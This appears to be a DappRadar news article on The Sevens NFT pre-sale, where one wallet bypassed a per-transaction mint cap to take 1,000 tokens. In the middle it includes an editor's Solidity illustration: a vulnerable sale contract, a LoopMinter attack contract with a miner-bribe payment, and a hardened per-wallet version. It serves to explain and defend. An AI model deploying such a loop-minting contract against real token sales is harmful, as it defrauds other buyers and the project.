Smart contract exploit and gas wars rile up the NFT community. Savvy dev or inside job?
The Sevens NFT collection, one of the most anticipated Ethereum-based drops of September, officially launched its pre-sale last night. Unfortunately, a series of events cast a shadow over the much-awaited drop. On one hand, the so-called “gas wars” phenomenon occurred; on the other, someone bypassed the smart contract's mint limiter, allowing a single wallet to mint 1,000 NFTs.
The Sevens had a meteoric rise in popularity across all social media channels in the past few weeks. Their main activity up until now was hyping up the community for this next great NFT collection. And it seemed to be working. Throughout the whole day yesterday, Twitter and Discord users were chatting in happy excitement for the upcoming drop. Most of them even added “777” to their handles to show their support for the project. Unfortunately, once the smart contract went live, this happy and cheerful vibe quickly transformed into disappointment and in some cases even anger.
What was the plan?
In a rather detailed Twitter post from the official The Sevens account, one of the devs explained the rules for the upcoming pre-sale.
The idea was that for the first seven minutes after the smart contract went live, each wallet could mint a single The Sevens NFT per transaction. After the seven minutes passed, this per-transaction limit rose to seven NFTs.
In theory, this sounds great and is a very clever marketing strategy with all the sevens in it. Unfortunately, things did not go as planned.
What went wrong with The Sevens NFT drop?
All was great up until seconds after the pre-sale for The Sevens NFT collection started. The first thing that went sideways, which was expected to some extent, was the huge gas fees people had to pay. While the mint price for a The Sevens NFT was 0.07 ETH, gas fees were exorbitant; users on Twitter reported figures in the thousands and even hundreds of thousands. Even so, many people jumped on the bandwagon and tried minting despite the high gas fees.
Here comes the second problem: 1ethSHOP. This account started minting The Sevens NFTs by calling the smart contract directly through Etherscan rather than through the official website. On Ethereum any public contract function can be called this way, and the dev team had said it left that route open on purpose to give collectors more flexibility. Unfortunately for everyone else, 1ethSHOP found a weakness in the contract's limiter that let him mint 1,000 NFTs, while other users were scraping together their last ETH to battle the gas fees and mint through the website. You can see how this is unfair.
In essence, by the end of the pre-sale, whoever managed to win the “gas wars” came away with only a handful of The Sevens NFTs, while 1ethSHOP snatched one-seventh of the whole collection.
How did 1ethSHOP manage that?
Ah, the joys of new technology. It turns out that 1ethSHOP is a rather knowledgeable individual, especially when it comes to coding, Solidity, and the overall workflow of smart contracts on Ethereum. The Sevens was not very fast in identifying what happened and only released a statement regarding the incident this morning. Twitter users, however, quickly started investigating.
In a very detailed Twitter thread, which has since generated more than 4,000 likes and 1,200 retweets, @0xBender explained the “hack”. According to him, 1ethSHOP sidestepped the limiter in The Sevens smart contract by deploying his own contract and having it call the collection's contract. The limiter was written around the rules of the pre-sale (one NFT per transaction for the first seven minutes, seven afterwards), and a calling contract can make many mint calls inside a single transaction, each of which satisfies a per-transaction cap on its own, so the timestamp-based limit never bit. To get those transactions included, 1ethSHOP used what is known as an MEV bribe: paying the block producer directly rather than through the gas price, so his transactions landed in blocks ahead of everything waiting in the public mempool. With extremely low gas fees!
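To make the bypass concrete, here is an added illustration written for this page by the editor. It is not The Sevens contract and not 1ethSHOP's code. It assumes the limiter checked only the quantity argument of each mint call and kept no per-wallet count; the contract names (PerTxCapSale, LoopMinter, PerWalletCapSale), MAX_SUPPLY and WALLET_CAP are assumptions, while the 0.07 ETH price and the seven-minute rule come from the article. The hardened variant at the end goes beyond the incident by showing the two checks a drop contract would add.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Editor's illustration of the per-transaction-cap bypass. Not The Sevens
// contract and not 1ethSHOP's code; names, MAX_SUPPLY and WALLET_CAP are
// assumptions. PRICE (0.07 ETH) and the seven-minute window are from the article.

contract PerTxCapSale {
    uint256 public constant PRICE = 0.07 ether;
    uint256 public constant MAX_SUPPLY = 7000;      // assumed
    uint256 public immutable saleStart;
    uint256 public totalSupply;
    mapping(uint256 => address) public ownerOf;     // minimal stand-in for ERC-721 state

    constructor() { saleStart = block.timestamp; }

    // Timestamp limiter: one token per transaction during the first seven
    // minutes of the sale, seven per transaction afterwards.
    function maxPerTx() public view returns (uint256) {
        return block.timestamp < saleStart + 7 minutes ? 1 : 7;
    }

    // WEAKNESS: the cap is checked only against `quantity`. Nothing records how
    // many tokens msg.sender already holds, so a contract can call mint(1) in a
    // loop inside a single transaction and every call passes the check.
    function mint(uint256 quantity) public payable virtual {
        require(quantity > 0 && quantity <= maxPerTx(), "over per-tx cap");
        require(msg.value == PRICE * quantity, "wrong payment");
        require(totalSupply + quantity <= MAX_SUPPLY, "sold out");
        for (uint256 i = 0; i < quantity; i++) {
            ownerOf[totalSupply++] = msg.sender;
        }
    }
}

// Caller contract in the style of the bypass: many mint(1) calls in one
// transaction. The minted tokens belong to this contract (msg.sender inside
// target.mint is LoopMinter); forwarding them to the operator is omitted.
contract LoopMinter {
    function drain(PerTxCapSale target, uint256 count, uint256 minerTip)
        external payable
    {
        uint256 price = target.PRICE();
        require(msg.value == price * count + minerTip, "fund count*price + tip");
        for (uint256 i = 0; i < count; i++) {
            target.mint{value: price}(1);   // each call individually satisfies the cap
        }
        // "MEV bribe": pay the block producer directly instead of through the gas
        // price. Submitted in a Flashbots-style bundle, the transaction can carry
        // a near-zero gas price and still be included ahead of the public mempool;
        // sent through the normal mempool this tip buys nothing.
        if (minerTip > 0) {
            block.coinbase.transfer(minerTip);
        }
    }
}

// Hardened variant: count per wallet rather than per call, and refuse callers
// that are contracts. Both checks are additions by the editor.
contract PerWalletCapSale is PerTxCapSale {
    uint256 public constant WALLET_CAP = 7;         // assumed
    mapping(address => uint256) public mintedBy;

    function mint(uint256 quantity) public payable override {
        // Blocks LoopMinter (msg.sender is the contract, tx.origin the EOA).
        // Caveat: this also blocks smart-contract wallets, and neither check
        // stops one person driving many separately funded EOAs.
        require(msg.sender == tx.origin, "contracts cannot mint");
        require(mintedBy[msg.sender] + quantity <= WALLET_CAP, "wallet cap reached");
        mintedBy[msg.sender] += quantity;
        super.mint(quantity);
    }
}
```

The lever in this pattern is that the rule was phrased per transaction but the attacker controls how many calls a transaction contains. The per-wallet counter is the check that actually encodes the rule; the tx.origin check only removes the cheapest route (one caller contract) and is a trade-off, since it locks out users of contract wallets. Neither closes the sybil path, which needs an allowlist or signed mint passes rather than on-chain counting.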
Thanks to this exploit, 1ethSHOP managed to quickly get his hands on 1000 The Sevens NFTs essentially throwing the rest of the pre-sale in disarray. Not only that, his OpenSea profile started flooding the market with The Sevens NFTs, and some people who couldn’t win in the gas wars bought NFTs from him.
The news that one account held so many The Sevens NFTs quickly spread across social media, and the reaction from the community bordered on a riot. That's understandable, bearing in mind that hundreds of users spent ETH on gas fees for transactions that failed, while one smart kid got one-seventh of the collection.
The official The Sevens Discord channel was on fire throughout the whole night, and the community was not happy. Many started speculating that the exploit was organized by The Sevens team purely for profit. Others added fuel to the fire by saying the whole project was fake, since no one could go from 1,000 to 40,000 followers in a matter of days.
Expectedly, a wave of disappointed tweets flooded the NFT Twitter space.
The Sevens accounts were overwhelmed with negative reactions; they were probably grateful that Twitter censors hate speech to an extent. Some users were definitely more eloquent in their disappointment. Interestingly, the devs and marketing team behind the collection only admitted that something had gone wrong hours later, after tweeting that the collection had successfully sold out.
The Sevens apologize?
In an official Medium apology, The Sevens team recognized that something had gone terribly wrong with their sale event. The apology dropped hours after the news broke on Twitter. According to the text, The Sevens reached out to 1ethSHOP and managed to strike a deal with him. The apology goes on to explain that 1ethSHOP was actually a huge fan of the collection, and that this is what pushed him to undertake such actions and snatch 1,000 NFTs. In an effort to mitigate the negative effects of his actions, 1ethSHOP offered to return 500 of the NFTs to the official The Sevens marketing address. That transfer went through. Now the team behind the collection is working out how to redistribute these NFTs to the community.
However, the question remains – why does 1ethSHOP get to keep the remaining 500 NFTs? In a Twitter post, 1ethSHOP explains that it cost him upwards of $1 million to return half of what he initially purchased. This includes the purchase price, gas fees for purchase, and gas fees for returning the NFTs to The Sevens.
The reactions to this apology were mixed. Some people recognize the ingenuity 1ethSHOP employed, and raise the fair point that anyone else with the knowledge to go through this process would have done the same. Some users, like Solaplex, even asked for a tutorial.
Others, however, still feel cheated. Twitter users ask why he got to keep 500 NFTs, when other people lost significant amounts of ETH on failed transactions and didn’t even manage to get a single one.
The Sevens official Twitter channel also saw a bunch of negative comments following the apology post. Unfortunately, such a huge mishap can completely destroy a project’s reputation. Not to mention take away any trust the community had in it.
What’s next for The Sevens NFT owners?
While The Sevens has taken steps in the right direction, this is a huge setback for the project. According to the Medium post, the 500 NFTs that were returned will probably be distributed to user wallets that can prove they had failed transactions during the mint yesterday. However, a decision has not yet been made on that matter. The Sevens is looking for community input on the subject. Additionally, the team will add 50 more NFTs from their marketing pool to the future airdrop.
Unfortunately, whatever efforts The Sevens put towards remedying this situation, the stain will remain. One positive thing that can be taken from this is that NFT developers now know about this exploit: a per-transaction cap on its own does not stop a contract that calls mint many times within one transaction, so pre-sale rules need to be enforced per wallet on-chain. Hopefully, this will be a lesson learned for the whole NFT community, and future collections will find ways to protect their smart contracts from this type of attack.
DappRadar will continue monitoring The Sevens development, as this situation resolves further. Stay tuned, and if you’d like to learn more about The Sevens, check out the links below.